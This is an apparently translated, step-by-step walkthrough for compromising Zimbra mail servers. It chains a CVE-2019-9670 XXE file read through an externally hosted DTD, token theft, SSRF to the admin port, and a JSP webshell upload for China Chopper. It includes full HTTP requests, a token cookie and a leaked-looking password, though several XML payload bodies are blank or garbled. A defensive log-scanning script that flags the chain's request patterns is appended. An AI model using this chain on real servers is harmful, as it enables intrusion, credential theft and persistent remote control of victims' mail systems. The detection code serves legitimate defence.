Zimbra

Time: 2020-1-12

Step 1: read the configuration file with XXE


CVE-2019-9670 is exploited here to read the configuration file. You need to host a DTD file on your own VPS and make it reachable over HTTP. For the demonstration I created a repository on GitHub and fetch the DTD file from there.

In the figure above, the password of the zimbra account is circled in red; note it down, as it is used later.

DTD file contents are as follows:

1   
2  
3 ">  
4 "> 

The POST request is as follows:

POST /Autodiscover/Autodiscover.xml HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 436  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

  
          
        %dtd;  
        %all;  
        ]>  
  
      
        aaaaa  
        &fileContents;

Step 2: get low permission token

The figure above shows that a token was obtained, but it is not an administrator token. Record it for now; it is used later.

The POST request is as follows:

POST /service/soap HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 467  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

  
     
         
             
         
     
     
       
        zimbra  
        GzXaU76_s5

Step 3: use SSRF to obtain admin permission token

Add the low-privilege token obtained in the previous step to the cookie, change xmlns="urn:zimbraAccount" to xmlns="urn:zimbraAdmin", append ":7071" to the Host header, and use HTTPS for the target in the URL. Then send the request to obtain an admin-privilege token.

The POST request is as follows:

POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1  
Host: mail.****.com:7071  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml  
Content-Length: 465  
Connection: close  
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b  
Upgrade-Insecure-Requests: 1  

  
     
         
             
         
     
     
       
        zimbra  
        GzXaU76_s5

Step 4: upload a webshell

Add the admin-privilege token obtained in the previous step to the cookie, then upload the webshell.

The webshell path is /downloads/k4x6p.jsp. To access the webshell, the admin token must be present in the cookie.

This webshell can be used to write another shell, connectable with the China Chopper (Caidao) client, into a directory that is accessible without a cookie.
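From a defender's side, the chain in steps 1 to 4 leaves a distinctive trail in the web server access log: a SOAP POST to /Autodiscover/Autodiscover.xml, a /service/proxy request whose target points at the loopback admin port 7071, and a .jsp fetched from /downloads/. The following is an added example, not code from the original post or from Zimbra; it scans combined-format access log lines (the sample lines are constructed) for those three patterns. The log format and the finding labels are assumptions.

```python
"""Flag the request patterns of the Zimbra XXE -> SSRF -> webshell chain in access logs."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Combined log format (assumed): ip - user [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify(method, raw_path):
    """Return a finding label for one request, or None if nothing matches."""
    url = urlparse(raw_path)
    path = url.path
    # Step 1: the Autodiscover SOAP endpoint is the CVE-2019-9670 XXE entry point
    if method == "POST" and path.lower() == "/autodiscover/autodiscover.xml":
        return "xxe-autodiscover"
    # Step 3: /service/proxy relaying to loopback or to the 7071 admin port
    if path == "/service/proxy":
        target = parse_qs(url.query).get("target", [""])[0]
        t = urlparse(unquote(target))
        if t.hostname in ("127.0.0.1", "localhost", "::1") or t.port == 7071:
            return "ssrf-admin-proxy"
    # Step 4: a JSP served from the /downloads/ tree
    if path.startswith("/downloads/") and path.lower().endswith(".jsp"):
        return "jsp-under-downloads"
    return None


def scan(lines):
    """Return (ip, label, path) for every suspicious request in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        label = classify(m["method"], m["path"])
        if label:
            findings.append((m["ip"], label, m["path"]))
    return findings


# Constructed sample log: one attacker host walking the chain, one benign visitor
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2020:10:01:02 +0800] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 503 1244 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2020:10:02:10 +0800] "POST /service/soap HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2020:10:03:44 +0800] "POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2020:10:05:01 +0800] "GET /downloads/k4x6p.jsp HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jan/2020:10:05:30 +0800] "GET /zimbra/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, label, path in scan(SAMPLE_LOG):
        print(ip, label, path)
```

The ordinary /service/soap login in step 2 is deliberately not flagged, since it is indistinguishable from a normal login at the HTTP layer; the three flagged patterns from one source address within a few minutes are the signal worth alerting on.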

I mainly did some collation work; thanks to the authors of the analysis articles published online.

Reference links:

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd